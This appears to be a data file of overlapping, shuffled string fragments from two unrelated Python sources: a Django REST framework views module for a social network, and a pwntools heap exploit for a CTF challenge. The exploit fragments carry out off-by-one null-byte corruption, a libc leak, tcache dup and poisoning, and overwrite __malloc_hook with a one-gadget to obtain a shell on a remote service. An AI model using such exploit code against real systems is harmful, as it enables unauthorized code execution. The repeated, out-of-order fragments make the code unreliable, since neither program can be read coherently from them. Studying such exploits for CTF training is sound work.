"pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if request.method ==", "from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse", "for social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response", "import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None):", "import reverse from .models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer", "return the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote =", "Create a new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class", "= self.get_object() if request.method == 'POST': # check if the vote already exists,", "of API, this is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles':", "request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\"", "ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful for", "for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list',", "Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of", "views for social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from", "Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request,", "don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user", "format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list", "ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given its", "api_root(request, format=None): \"\"\"Root of API, this is useful for documentation generated by DRF.\"\"\"", "class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all()", "Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root", "PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful for documentation", "format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset", "if so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): #", "associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None):", "allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already", "= PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\"", "Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a", "so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the", "\"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post", "check if the vote already exists, if so don't allow the user to", "@detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\"", "\"\"\"This provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class =", "for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create", "Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This", "list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get", "Response from rest_framework.reverse import reverse from .models import Profile, Post, Vote from .serializers", "format=None): \"\"\"Root of API, this is useful for documentation generated by DRF.\"\"\" return", "is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format),", "import Response from rest_framework.reverse import reverse from .models import Profile, Post, Vote from", "reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for", "vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the", "rest_framework.response import Response from rest_framework.reverse import reverse from .models import Profile, Post, Vote", "\"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if request.method == 'POST':", "user already voted, just return the post directly data = PostSerializer(post, context={'request': self.request}).data", "post=post).exists(): # the user already voted, just return the post directly data =", "rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from", "vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if", "useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts':", "Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request':", "the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer):", "the user already voted, just return the post directly data = PostSerializer(post, context={'request':", "Posts. retrieve: Return a post given its ID. list: Get a paginated list", "a paginated list of all Posts. create: Create a new Post as the", "retrieve: Return a post given its ID. list: Get a paginated list of", "queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve:", "rest_framework.reverse import reverse from .models import Profile, Post, Vote from .serializers import ProfileSerializer,", "url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post =", "\"\"\"Get or create Posts. retrieve: Return a post given its ID. list: Get", "API, this is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list',", "'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality", "request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and", "request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object() if request.method", "provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer", "to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return", "Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API,", "\"\"\"Root of API, this is useful for documentation generated by DRF.\"\"\" return Response({", "detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from .models import Profile,", "on a post.\"\"\" post = self.get_object() if request.method == 'POST': # check if", "from .models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def", "Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the", "viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import", "= Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post,", "with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote", "# the user already voted, just return the post directly data = PostSerializer(post,", "user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a", "context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE':", "Posts. create: Create a new Post as the logged-in user. \"\"\" queryset =", ".models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request,", "if request.method == 'POST': # check if the vote already exists, if so", "from rest_framework.reverse import reverse from .models import Profile, Post, Vote from .serializers import", "create Posts. retrieve: Return a post given its ID. list: Get a paginated", "PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile)", "already exists, if so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile,", "== 'POST': # check if the vote already exists, if so don't allow", "Return a post given its ID. list: Get a paginated list of all", "of all Posts. create: Create a new Post as the logged-in user. \"\"\"", "def api_root(request, format=None): \"\"\"Root of API, this is useful for documentation generated by", "by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) })", "= PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method", "self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile,", "a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self,", "# check if the vote already exists, if so don't allow the user", "the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile,", "post.\"\"\" post = self.get_object() if request.method == 'POST': # check if the vote", "= Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with", "request.method == 'POST': # check if the vote already exists, if so don't", "vote already exists, if so don't allow the user to vote again if" ]
[ "new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:',", "this causes strcpy writes null byte at the end of buffer. # when", "big chunk will be put in the unsorted bin delete_heap(2) # table[1] =>", "# therefore, we have a overlapping free chunk with chunk_1 # the resulting", "at the head of the list, this allocation returns it # then, we", "(0x71) # this will allocate chunk_5 exactly in the same place as chunk_1", "=> chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0,", "they are pointing to the same address delete_heap(0) delete_heap(2) # we can create", "table[0] => chunk_1 (0x71) # this causes strcpy writes null byte at the", "print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate", "* 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3]", "which is due to double free # freeing chunk_1 and chunk_5 put them", "chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we need to", "the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40]", "=> chunk_3 (0x31) # this chunk is for preventing consolidation of previous #", "Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i))", "end of buffer. # when i == 0, off-by-one happens and turn size", "(0x71) # we used tcache_poisoning here # chunk_5 will be served from tcache", "the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set", "we can create a fake chunk before __malloc_hook with size of 0x7f malloc_hook", "PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i)) # we need", "the chunk_1 multiple times with different sizes # interestingly, it always have chunk", "p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice:", "same bin in tcache # even though they are pointing to the same", "malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk:", "only cares # about the input size for i in range(9): # table[0]", "''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] =>", "free a chunk, programs writes 0xDA to the whole chunk # so, we", "=> chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b'", "allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67)", "chunk_1, so we can re-allocate it again # in order to launch off-by-one", "__malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook", "field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free", "the head of the list, this allocation returns it # then, we overwrite", "# when we free chunk_2, it consolidates with chunk_0 # therefore, we have", "+ '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) #", "set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) #", "table[0] => chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68,", "when i == 0, off-by-one happens and turn size of chunk_2 from #", "them in the same bin in tcache # even though they are pointing", "allocation returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i'", "fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0)", "and put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) '''", "chunk_1 # the resulting big chunk will be put in the unsorted bin", "chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) #", "chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk", "'b' * 0x60 + p64(0x580)) # when we free chunk_2, it consolidates with", "= libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk))", "p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data)", "'./libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] =>", "# we need to delete chunk_1, so we can re-allocate it again #", "p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0]", "address delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook with", "we used tcache_dup attack here which is due to double free # freeing", "chunk with chunk_1 # the resulting big chunk will be put in the", "execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f)", "unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the", "order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so", "(8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5", "# table[0] => chunk_1 (0x71) # this set the prev_size field of chunk_2", "new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and", "we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base +", "here # chunk_5 will be served from tcache and we will put the", "next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the", "size of chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit.", "interestingly, it always have chunk size of 0x71, but the program only cares", "# the resulting big chunk will be put in the unsorted bin delete_heap(2)", "data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data)", "attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice:", "table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31)", "in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used", "chunk size of 0x71, but the program only cares # about the input", "to free the chunk, so malloc returns it on the next new_heap call", "table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk", "0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] =>", "i in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes", "'d' * 0x20) # we need to delete chunk_1, so we can re-allocate", "# when we free a chunk, programs writes 0xDA to the whole chunk", "u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base))", "size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13", "we free a chunk, programs writes 0xDA to the whole chunk # so,", "=> chunk_1 (0x71) # this causes strcpy writes null byte at the end", "p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p =", "we free chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping", "double free # freeing chunk_1 and chunk_5 put them in the same bin", "# about the input size for i in range(9): # table[0] => chunk_1", "# this chunk is for preventing consolidation of previous # chunks with the", "later delete_heap(0) # when we free a chunk, programs writes 0xDA to the", "chunk # so, we need to zero out some parts of the chunk_1.", "causes strcpy writes null byte at the end of buffer. # when i", "tcache_dup attack here which is due to double free # freeing chunk_1 and", "+ p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 # therefore,", "= malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71)", "this allocation serves chunk_1 and put fake chunk address in the tcache new_heap(0x68,", "this will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f'", "0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 -", "writes 0xDA to the whole chunk # so, we need to zero out", "with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this", "t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68", "- 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we", "environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since", "new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which is due", "< size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index):", "chunk_5 put them in the same bin in tcache # even though they", "times with different sizes # interestingly, it always have chunk size of 0x71,", "# hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD':", "# this causes strcpy writes null byte at the end of buffer. #", "is at the head of the list, this allocation returns it # then,", "different sizes # interestingly, it always have chunk size of 0x71, but the", "# a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) #", "is for preventing consolidation of previous # chunks with the top chunk new_heap(0x20,", "re-allocate it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) #", "address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 -", "(0x511) # this will use the unsorted bin for allocation, and writes #", "size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your", "we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i)) #", "new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef)", "if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index))", "(0x7f) # since fake_chunk is at the head of the list, this allocation", "to double free # freeing chunk_1 and chunk_5 put them in the same", "def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return", "new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr", "since fake_chunk is at the head of the list, this allocation returns it", "(poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can be consolidated", "parts of the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple times", "new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size", "freeing chunk_1 and chunk_5 put them in the same bin in tcache #", "choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index))", "chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this", "0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will", "fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc address", "libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8", "'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL '''", "# we can create a fake chunk before __malloc_hook with size of 0x7f", "#!/usr/bin/env python from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ',", "create a fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base", "libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) -", "# we used tcache_poisoning here # chunk_5 will be served from tcache and", "free chunk with chunk_1 # the resulting big chunk will be put in", "# in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we", "chunk will be put in the unsorted bin delete_heap(2) # table[1] => chunk_4", "bin for allocation, and writes # a libc address into chunk_1 fd/bk fields", "then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base", "chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk address in", "with chunk_1 # the resulting big chunk will be put in the unsorted", "to delete chunk_1, so we can re-allocate it again # in order to", "+ 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4]", "{}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5", "# this allocation serves chunk_1 and put fake chunk address in the tcache", "# we are allocating/freeing the chunk_1 multiple times with different sizes # interestingly,", "chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping free chunk", "* 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we", "it on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) #", "[rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is", "tcache # even though they are pointing to the same address delete_heap(0) delete_heap(2)", "from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:',", "p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: #", "when we free chunk_2, it consolidates with chunk_0 # therefore, we have a", "=> chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68,", "it always have chunk size of 0x71, but the program only cares #", "therefore, we have a overlapping free chunk with chunk_1 # the resulting big", "str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program',", "address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will", "need to zero out some parts of the chunk_1. Therefore, # we are", "we need to free the chunk, so malloc returns it on the next", "when we free a chunk, programs writes 0xDA to the whole chunk #", "the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation", "put the address of # our fake chunk in the chunk_1's fd. new_heap(0x68,", "Therefore, # we are allocating/freeing the chunk_1 multiple times with different sizes #", "constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk", "the same bin in tcache # even though they are pointing to the", "in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes null", "the unsorted bin for allocation, and writes # a libc address into chunk_1", "p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 # therefore, we", "str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}", "from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i,", "to the whole chunk # so, we need to zero out some parts", "* 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for preventing", "'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) #", "chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c'", "chunk_5 (0x71) # this will allocate chunk_5 exactly in the same place as", "we used tcache_poisoning here # chunk_5 will be served from tcache and we", "'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and", "we need to delete chunk_1, so we can re-allocate it again # in", "# when i == 0, off-by-one happens and turn size of chunk_2 from", "', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with", "p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2')", "a fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base +", "choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) <", "# table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2", "# table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3", "free # freeing chunk_1 and chunk_5 put them in the same bin in", "# our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] =>", "'2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet:", "# table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1", "we are allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it", "tcache_poisoning here # chunk_5 will be served from tcache and we will put", "chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b'", "tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] ==", "freed so it can be consolidated with chunk_2 later delete_heap(0) # when we", "zero out some parts of the chunk_1. Therefore, # we are allocating/freeing the", "and chunk_5 put them in the same bin in tcache # even though", "the whole chunk # so, we need to zero out some parts of", "(0x68 - i)) # we need to free the chunk, so malloc returns", "'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for", "we can re-allocate it again # in order to launch off-by-one (poison-null-byte) attack", "chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) #", "p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p =", "new_heap(0x68 - i, 'b' * (0x68 - i)) # we need to free", "put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322", "p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put", "are allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it always", "print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning", "- i)) # we need to free the chunk, so malloc returns it", "consolidated with chunk_2 later delete_heap(0) # when we free a chunk, programs writes", "chunk_0 should we freed so it can be consolidated with chunk_2 later delete_heap(0)", "the same address delete_heap(0) delete_heap(2) # we can create a fake chunk before", "rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) #", "(0x71) # this allocation serves chunk_1 and put fake chunk address in the", "at the end of buffer. # when i == 0, off-by-one happens and", "due to double free # freeing chunk_1 and chunk_5 put them in the", "# then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 +", "we freed so it can be consolidated with chunk_2 later delete_heap(0) # when", "of buffer. # when i == 0, off-by-one happens and turn size of", "with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook -", "so, we need to zero out some parts of the chunk_1. Therefore, #", "chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr +", "out some parts of the chunk_1. Therefore, # we are allocating/freeing the chunk_1", "bin in tcache # even though they are pointing to the same address", "(0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' *", "# viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base =", "will be put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511)", "8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511)", "chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2, it", "delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook with size", "p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500,", "{'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1]", "0x67) # we used tcache_dup attack here which is due to double free", "the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use", "of previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20) #", "+ p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have shell", "but the program only cares # about the input size for i in", "* 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3]", "allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it always have", "* 0x67) # we used tcache_dup attack here which is due to double", "table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in the same", "the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup", "call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size field", "- len(libc_addr))) - 